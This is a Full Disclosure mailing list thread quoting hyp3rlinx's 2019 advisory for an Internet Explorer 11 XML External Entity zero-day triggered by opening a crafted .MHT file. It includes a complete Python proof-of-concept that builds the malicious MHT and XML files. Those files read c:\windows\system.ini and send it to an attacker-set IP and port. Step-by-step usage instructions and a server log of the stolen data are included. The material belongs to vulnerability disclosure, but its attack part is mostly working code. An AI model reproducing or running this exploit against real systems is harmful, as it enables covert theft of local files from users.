Vimeo reinstated my account few hours later but I switched to youtube for now.. but will check those out.
Thank you for that... hyp3rlinx On Tue, Apr 16, 2019 at 4:12 AM bo0od <bo...@riseup.net> wrote: > have your own videos either on one of the PeerTubes instances or have > your own instance. > > https://joinpeertube.org/en/ > > other good alternative would be: > > https://mediagoblin.org/pages/tour.html > > Enjoy! > > hyp3rlinx: > > vimeo removed my account for no good reason so new POC url is included. > > > > [+] Credits: John Page (aka hyp3rlinx) > > [+] Website: hyp3rlinx.altervista.org > > [+] Source: > > > http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt > > [+] ISR: ApparitionSec > > > > > > [Vendor] > > www.microsoft.com > > > > > > [Product] > > Microsoft Internet Explorer v11 > > (latest version) > > > > Internet Explorer is a series of graphical web browsers developed by > > Microsoft and included in the Microsoft Windows line of operating > systems, > > starting in 1995. > > > > > > [Vulnerability Type] > > XML External Entity Injection > > > > > > > > [CVE Reference] > > N/A > > > > > > > > [Security Issue] > > Internet Explorer is vulnerable to XML External Entity attack if a user > > opens a specially crafted .MHT file locally. > > > > This can allow remote attackers to potentially exfiltrate Local files and > > conduct remote reconnaissance on locally installed > > Program version information. Example, a request for > "c:\Python27\NEWS.txt" > > can return version information for that program. > > > > Upon opening the malicious ".MHT" file locally it should launch Internet > > Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K" > > and other interactions like right click "Print Preview" or "Print" > commands > > on the web-page may also trigger the XXE vulnerability. > > > > However, a simple call to the window.print() Javascript function should > do > > the trick without requiring any user interaction with the webpage. > > Importantly, if files are downloaded from the web in a compressed archive > > and opened using certain archive utilities MOTW may not work as > advertised. > > > > Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" > > users will get a security warning bar in IE and be prompted > > to activate blocked content. However, when opening a specially crafted > .MHT > > file using malicious <xml> markup tags the user will get no such > > active content or security bar warnings. > > > > e.g. > > > > C:\sec>python -m SimpleHTTPServer > > Serving HTTP on 0.0.0.0 port 8000 ... > > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 - > > 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET > > > /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] > > HTTP/1.1" 200 - > > > > > > Tested successfully in latest Internet Explorer Browser v11 with latest > > security patches on Win7/10 and Server 2012 R2. > > > > > > > > [POC/Video URL] > > https://www.youtube.com/watch?v=fbLNbCjgJeY > > > > > > > > [Exploit/POC] > > POC to exfil Windows "system.ini" file. > > Note: Edit attacker server IP in the script to suit your needs. > > > > 1) Use below script to create the "datatears.xml" XML and XXE embedded > > "msie-xxe-0day.mht" MHT file. > > > > 2) python -m SimpleHTTPServer > > > > 3) Place the generated "datatears.xml" in Python server web-root. > > > > 4) Open the generated "msie-xxe-0day.mht" file, watch your files be > > exfiltrated. > > > > > > #Microsoft Internet Explorer XXE 0day > > #Creates malicious XXE .MHT and XML files > > #Open the MHT file in MSIE locally, should exfil system.ini > > #By hyp3rlinx > > #ApparitionSec > > > > ATTACKER_IP="localhost" > > PORT="8000" > > > > mht_file=( > > 'From:\n' > > 'Subject:\n' > > 'Date:\n' > > 'MIME-Version: 1.0\n' > > 'Content-Type: multipart/related; type="text/html";\n' > > '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"\n' > > 'This is a multi-part message in MIME format.\n\n\n' > > > > '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n' > > 'Content-Type: text/html; charset="UTF-8"\n' > > 'Content-Location: main.htm\n\n' > > > > '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" " > > http://www.w3.org/TR/html4/transitional.dtd";>\n' > > '<html>\n' > > '<head>\n' > > '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n' > > '<title>MSIE XXE 0day</title>\n' > > '</head>\n' > > '<body>\n' > > '<xml>\n' > > '<?xml version="1.0" encoding="utf-8"?>\n' > > '<!DOCTYPE r [\n' > > '<!ELEMENT r ANY >\n' > > '<!ENTITY % sp SYSTEM "http:// > > '+str(ATTACKER_IP)+":"+PORT+'/datatears.xml">\n' > > '%sp;\n' > > '%param1;\n' > > ']>\n' > > '<r>&exfil;</r>\n' > > '<r>&exfil;</r>\n' > > '<r>&exfil;</r>\n' > > '<r>&exfil;</r>\n' > > '</xml>\n' > > '<script>window.print();</script>\n' > > '<table cellpadding="0" cellspacing="0" border="0">\n' > > '<tr>\n' > > '<td class="contentcell-width">\n' > > '<h1>MSIE XML External Entity 0day PoC.</h1>\n' > > '<h3>Discovery: hyp3rlinx</h3>\n' > > '<h3>ApparitionSec</h3>\n' > > '</td>\n' > > '</tr>\n' > > '</table>\n' > > '</body>\n' > > '</html>\n\n\n' > > > > '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--' > > ) > > > > xml_file=( > > '<!ENTITY % data SYSTEM "c:\windows\system.ini">\n' > > '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http:// > > '+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n' > > '<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n' > > '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http:// > > '+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n' > > ) > > > > def mk_msie_0day_filez(f,p): > > f=open(f,"wb") > > f.write(p) > > f.close() > > > > > > if __name__ == "__main__": > > mk_msie_0day_filez("msie-xxe-0day.mht",mht_file) > > mk_msie_0day_filez("datatears.xml",xml_file) > > print "Microsoft Internet Explorer XML External Entity 0day PoC." > > print "Files msie-xxe-0day.mht and datatears.xml Created!." > > print "Discovery: Hyp3rlinx / Apparition Security" > > > > > > > > > > [Network Access] > > Remote > > > > > > > > [Severity] > > High > > > > > > > > [Disclosure Timeline] > > Vendor Notification: March 27, 2019 > > Vendor acknowledgement: March 27, 2019 > > Case Opened: March 28, 2019 > > MSRC reponse April 10, 2019: "We determined that a fix for this issue > will > > be considered in a future version of this product or service. > > At this time, we will not be providing ongoing updates of the status of > the > > fix for this issue, and we have closed this case." > > April 10, 2019 : Public Disclosure > > > > > > > > [+] Disclaimer > > The information contained within this advisory is supplied "as-is" with > no > > warranties or guarantees of fitness of use or otherwise. > > Permission is hereby granted for the redistribution of this advisory, > > provided that it is not altered except by reformatting it, and > > that due credit is given. Permission is explicitly given for insertion in > > vulnerability databases and similar, provided that due credit > > is given to the author. The author is not responsible for any misuse of > the > > information contained herein and accepts no responsibility > > for any damage caused by the use or misuse of this information. The > author > > prohibits any malicious use of security related information > > or exploits by the author or elsewhere. All content (c). > > > > hyp3rlinx > > > > _______________________________________________ > > Sent through the Full Disclosure mailing list > > https://nmap.org/mailman/listinfo/fulldisclosure > > Web Archives & RSS: http://seclists.org/fulldisclosure/ > > > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
